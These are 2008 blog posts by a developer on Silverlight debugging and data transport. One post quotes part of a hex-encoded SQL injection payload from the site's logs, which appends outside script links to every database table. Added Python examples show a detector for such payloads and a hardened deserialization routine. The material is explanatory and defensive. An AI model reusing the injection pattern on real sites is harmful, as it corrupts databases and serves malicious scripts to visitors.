by Bobbi Perreault
15. August 2008 01:47
So Sad! That's what my 2-year-old grandson hears from his mom when he's about to be reprimanded. You can see his head come up; he knows he should have thought before acting.
I want to talk about lessons learned here. Not to criticize, but hopefully to provide some wisdom for others to pattern their Silverlight projects after. My Silverlight project was set aside in favor of speed and to optimize time to project completion. In other words, the deadline loomed and the work wasn't done. In addition to that, there were no other team members who could help with the load, which meant I sat alone on the critical path. So it's done for now.
I'm not done for long, though, have no fear. When you get bucked off the horse - you by golly get back on and ride. So I will be working Silverlight right along - but once again it will not be in my day job.
So Sad!
by Bobbi Perreault
14. August 2008 03:15
There was an interesting topic that came up today on the LinkedIn Minnesota Group - that of an anonymous business that had had their entire SQL database filled with junk from a hack attack.
The first thing that came to my mind there was SQL injection. It's insidious, and dangerous, and the crooks are very bold in their efforts to use it.
I have a perfect example of one of those types of web site visits where the low-life-can-it-be-human (LLCIBH) who was at the page was trying to inject poison into the site. My sites inform me of any failed access attempts or errors in an email - and that email includes all the information I may need to troubleshoot the problem. So, on this day I was notified by email of the full contents of the request.
The LLCIBH (translation above) sent a hexadecimal-encoded, very long querystring at the site, which when decoded contained SQL that looked something like this:
DECLARE @S CHAR(4000);
SET @S=CAST(0x4445434C415245204054207661726368617228323535292C4043207661726368617228343
0303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C656374206
12E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E7320622
.................stuff left out here..........
6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D27272729464554434820
4E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F53
45205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));
select @s
--EXEC(@S);
That mess up there translates into SQL that pulls a list of updateable objects from "sysobjects a", declares a cursor over that list, and for EACH and EVERY updateable object found, updates that table, appending links to the LLCIBH's site.
If this happens to anyone, they should just plan on restoring from backup. The mess is too insidious, too entangled to fix by hand. It's basically ruined.
Be Careful Out There.
Bobbi
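An added example (not from the original post): a Python sketch of how a request logger, like the error e-mails described above, could flag this pattern and decode the hex literal to text for review without sending anything to a database. The sample query string, the keyword list and the function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# CAST(0x<hex> AS CHAR/VARCHAR/NVARCHAR...), the shape of the request quoted above.
CAST_HEX = re.compile(r"CAST\s*\(\s*0x([0-9A-Fa-f]{16,})\s+AS\s+N?(?:VAR)?CHAR", re.I)

# Assumed keyword list: words that have no business inside a hex literal in a URL.
SQL_KEYWORDS = ("declare", "cursor", "sysobjects", "syscolumns", "update ", "exec")

def find_encoded_sql(query_string):
    """Return the decoded text of every hex literal passed to CAST(... AS CHAR)."""
    text = query_string
    for _ in range(2):                      # undo up to two layers of URL encoding
        text = unquote_plus(text)
    found = []
    for match in CAST_HEX.finditer(text):
        digits = match.group(1)
        if len(digits) % 2:                 # odd length: drop the dangling nibble
            digits = digits[:-1]
        # latin-1 maps every byte to a character, so decoding never fails
        found.append(bytes.fromhex(digits).decode("latin-1"))
    return found

def score_request(query_string):
    """Count SQL keywords hidden inside hex literals; 0 means nothing was found."""
    hits = 0
    for decoded in find_encoded_sql(query_string):
        lowered = decoded.lower()
        hits += sum(1 for kw in SQL_KEYWORDS if kw in lowered)
    return hits

# Constructed sample: a harmless statement, hex-encoded the way the logged request was.
SAMPLE_SQL = "DECLARE @T varchar(255); SELECT name FROM sysobjects"
SAMPLE_QS = ("id=5;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x"
             + SAMPLE_SQL.encode("ascii").hex().upper()
             + "%20AS%20CHAR(4000));")

if __name__ == "__main__":
    print(find_encoded_sql(SAMPLE_QS))
    print("keyword hits:", score_request(SAMPLE_QS))
```

A non-zero score is a reason to reject the request and alert; the underlying fix remains parameterized queries, so that nothing in a querystring is ever executed as SQL.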
by Bobbi Perreault
11. August 2008 02:16
I'm still crazy in love with the promise of Silverlight and so excited to be able to work in it. So please take that statement and keep it in mind while I rant.
I'm able to participate in the development of a rather ambitious Silverlight application. One which is teaching me a lot about how to optimize my time, how to find what's really broken, and how to keep the dang debugger attached.
It seems that the .xap file is cached by the browser. This is doubly complicated if you've got a Silverlight application that uses a separate .dll for business logic. Changing the Business Logic .dll will not "register" with the environment to send a new xap. Either that, or Internet Explorer doesn't think it should have to download a new .xap file to the client for whatever reason.
You know you've got an old copy of the .xap in your cache if your debugging breakpoints are disabled when the control is loaded in the browser. So although this is easily fixed (CLEAR YOUR TEMPORARY FILES), it took me literally DAYS to figure it out. Heck, I tried everything: close Visual Studio, reboot my computer, search the Internet for answers. So heartbreaking when you're on a fixed timeline.
Tools/Internet Options/Delete/Delete Files/YES/Close/OK
That's my new routine. I'm going to actually add it as a post-build action for my Silverlight project. Whenever it gets compiled, it will clear the temporary files before launching the debugger when I F5.
On September 9, 2008, I've got a session on Search Engine Optimization for Silverlight Web Applications at the Minnesota Developer's Conference. There, I'll be giving examples of how to code your web apps to keep our web OPEN. This talk will be lots of code and little background, so bring your Inner Geek and be ready to let her out.
by Bobbi Perreault
1. August 2008 10:52
The problem is how to transport objects and data from server to Silverlight and back and do the least amount of typing. The databinding features of a Silverlight application make transporting the contents of an object from code to UI so simple. That's how I want to be able to send the contents of the object to the server and how I want to be able to retrieve the contents of that object on the server side.
In a monolithic web application this is simple: serialize from object to XML and back again into object after the outside code has been executed against the object contents.
In a Silverlight project, it's not so simple for these reasons:
1. Silverlight doesn't support serialization natively
2. Silverlight objects in binary form must be in a separate runtime. (double the fun)
3. Each class in a Silverlight project must be echoed as a class on the server
Here is one way to resolve these problems and add a service layer to your .asp/mvc application.
I used these tools to complete the task: SubSonic for code gen; DimeBrain (huh?) Silverlight Serialization, which is based on CSLA Light classes; and Peter Bromberg's SharpLib for Silverlight.
Here's what happens: The Silverlight control has a member which is one of the classes marked for serialization and which will have its properties bound to controls for user manipulation. When the user pushes Save, this object is serialized to XML (DimeBrain), compressed (Peter Bromberg), base64'd (.NET), and UrlEncoded (.NET).
The resulting "dried" data is then transmitted to the server in a form POST request. In an MVC app, the URL that is targeted looks like so: http://server/admin/data/classname
Again, using MVC, on the server within the targeted controller (admin), there is a method (data) which calls a function whose purpose is to reverse the process used in Silverlight: UrlDecode, un-base64, uncompress, and deserialize the Request Stream to an object.
The XML representation that is received contains the name of the class which was serialized. These server-side classes are generated code (SubSonic!, using custom templates) and have been added to the server application's Business Logic layer. The end result is that there is a class on the server with the same class structure as the Silverlight object. And both of these data holders are created using code gen.
When this object has been "re-hydrated", so to speak, it's passed off to the correct data Repository for parsing into a server-side object (Entity Framework, maybe?) and placed into storage.
Once the wiring is in place, implementing additional control communications is a 45 minute job. Can that be any simpler?
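An added example, not the author's code: the same dry/re-hydrate round trip sketched in Python, with zlib standing in for the compression library named above, showing checks the server side can make before trusting the class name carried in the XML. The Customer class, the allowlist and the 64 KB cap are assumptions for illustration.

```python
import base64
import zlib
import xml.etree.ElementTree as ET
from urllib.parse import quote, unquote

MAX_XML_BYTES = 64 * 1024            # assumed cap on the decompressed document

class Customer:                       # hypothetical generated data holder
    def __init__(self, name="", city=""):
        self.name, self.city = name, city

ALLOWED = {"Customer": Customer}     # only these class names may be rebuilt

def dry(obj):
    """Client side: object -> XML -> compress -> base64 -> URL-encode."""
    root = ET.Element(type(obj).__name__)
    for field, value in vars(obj).items():
        ET.SubElement(root, field).text = str(value)
    packed = zlib.compress(ET.tostring(root))
    return quote(base64.b64encode(packed).decode("ascii"), safe="")

def rehydrate(body):
    """Server side: reverse the steps, validating before any object is built."""
    packed = base64.b64decode(unquote(body), validate=True)
    inflater = zlib.decompressobj()
    xml_bytes = inflater.decompress(packed, MAX_XML_BYTES)
    if not inflater.eof:              # stream did not finish within the cap
        raise ValueError("decompressed payload exceeds size cap or is truncated")
    if b"<!" in xml_bytes:            # no DOCTYPE/entities (also rejects comments, CDATA)
        raise ValueError("markup declarations are not accepted")
    root = ET.fromstring(xml_bytes)
    cls = ALLOWED.get(root.tag)       # class name comes from the client: look it up,
    if cls is None:                   # never resolve it by reflection
        raise ValueError("class %r is not on the allowlist" % root.tag)
    obj = cls()
    for child in root:
        if child.tag in vars(obj):    # ignore fields the class does not declare
            setattr(obj, child.tag, child.text or "")
    return obj

if __name__ == "__main__":
    wire = dry(Customer("Ann", "Duluth"))
    back = rehydrate(wire)
    print(wire[:24] + "...", "->", back.name, back.city)
```

The POST body is attacker-controlled like any other request data, so the size cap and the class-name lookup run before anything is handed to the repository.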